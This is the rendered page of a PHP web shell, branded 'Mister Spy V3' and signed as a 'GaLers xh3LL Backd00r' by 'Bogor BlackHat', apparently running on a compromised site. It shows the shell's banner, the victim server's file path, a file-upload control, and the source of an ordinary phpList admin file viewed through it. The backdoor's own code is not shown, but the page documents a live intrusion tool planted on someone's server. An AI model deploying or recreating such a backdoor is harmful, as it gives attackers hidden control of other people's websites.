Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/phplist/lists/admin/
Upload File :
Current File : /home/caballoscriollos/public_html/phplist/lists/admin/msgstatus.php

<?php
require_once dirname(__FILE__).'/accesscheck.php';

@ob_end_clean();
$id = sprintf('%d',$_GET['id']);
if (!$id) {
  return '';
}
$message = Sql_Fetch_Assoc_Query(sprintf('select * from %s where id = %d',$GLOBALS['tables']['message'],$id));
$messagedata = loadMessageData($id);

if ($message['status'] != 'inprocess') {
  $html = $message['status'];
  $html .= '<br/>'.PageLink2("messages",$GLOBALS['I18N']->get("requeue"),"resend=".$message["id"]);
} else {
  $active = time() - $messagedata['last msg sent'];
  if ($active > 60) {
    $html = $GLOBALS['I18N']->get('Stalled');
  } else {
    $totalsent = $messagedata['astext'] + 
      $messagedata['ashtml'] + 
      $messagedata['astextandhtml'] + 
      $messagedata['aspdf'] + 
      $messagedata['astextandpdf'];
    $html = $GLOBALS['I18N']->get($message['status']).'<br/>'.
    $messagedata['to process'].' '.$GLOBALS['I18N']->get('still to process').'<br/>'.
    $GLOBALS['I18N']->get('ETA').': '.$messagedata['ETA'].'<br/>'.
    $GLOBALS['I18N']->get('sent').': '.$totalsent.'<br/>'.
    $GLOBALS['I18N']->get('Processing').' '.sprintf('%d',$messagedata['msg/hr']).' '.$GLOBALS['I18N']->get('msgs/hr')
    ;
  }
}

print $html;
exit;
?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat